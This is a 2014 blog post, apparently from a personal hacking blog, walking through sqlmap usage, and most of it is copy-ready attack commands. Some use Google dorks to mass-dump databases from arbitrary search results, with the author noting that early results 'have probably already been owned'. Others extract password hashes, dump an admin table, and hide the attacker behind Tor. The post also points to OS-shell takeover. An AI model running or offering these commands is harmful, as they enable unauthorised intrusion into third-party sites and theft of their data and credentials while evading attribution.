Electronic currency exchanger list SQLMap - Basic / Intermediate usage

Friday, 16 May 2014

SQLMap - Basic / Intermediate usage

Sigit Chaw 17:08
So I've recently been interested in web security a bit more and while learning more about SQL injections I came across a tool I found handy. This is sqlmap, an SQL Injection and Database takeover tool. Sqlmap can handle a variety of database management systems such as MS SQL, MYSQL, Oracle and so on. It supports five injection techniques - boolean-based blindtime-based blinderror-basedUNION query and stacked queries. It can retrieve tables, along with its contents. It also has a built in hash cracking function to attempt to crack known hash's with a dictionary based attack. It has many other fun features such as metasploit interaction for privilege escalation and utilization of google dorks, which I will give an example of below.


This command with use a given google dork and attempt to dump all available information from all the results on the first page of google. 


python sqlmap.py --dump-all -g "inurl:prodID=3030"

Now this could come in handy when pentesting because you could use google dorks to focus in on the target and spider it for specific pages or just more possible vulnerabilities. Or just  use it for the general dork fun. You can also choose a different page for the google results as the default is the first page and those have probably already been owned. Also, so we can multitask and be notified when an sql injection is found we can will add the following beep command.


python sqlmap.py --dump-all -g "inurl:prodID=3030" --gpage 3 --beep


Another possibility when targeting a specific target in a pentest you can do something like this;


python sqlmap.py -g "site:'hakhub.tk' inurl:'/prodID='" --current-user --passwords

You can also specify certain things to extract to save time which I'm sure you'll see. To start off we will fingerprint the system to get an idea of what we're dealing with. Than we will find the databases and tables with verbosity and proceed to issue another command to extract the current user and password hash's.


python sqlmap.py -u www.example.com/shop/prodID=777 -f


If all's we'll proceed to issue the following commands, this will automate the process (--batch) and show us the estimated time (--eta); 

python sqlmap.py -u www.example.com/shop/prodID=777 --dbs --tables -v 6 --batch --eta

python sqlmap.py -u www.example.com/shop/prodID=777 -D example_DB --tables --batch --eta

Now we know the example DBase have a table named ex_admin, so we'll pull that tables columns.


python sqlmap.py -u www.example.com/shop/prodID=777 -D example_DB -T ex_admin --dump -batch --eta


If we wanted to do this via a proxy, you can use the --proxy flag as I will show you. We'll assume you've got tor and polipo up and running.

python sqlmap.py -u www.example.com/shop/prodID=777 -D example_DB -T ex_admin --dump --batch --eta --proxy=http://127.0.0.1:8123


You can also brute force common tables and column with the --common-tables feature abd play around with the OS Takeover portion of it with --os-pwn (which utilizes metasploit) and --os-shell.

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Recent Posts

Posts

Contact Form

Name

Email *

Message *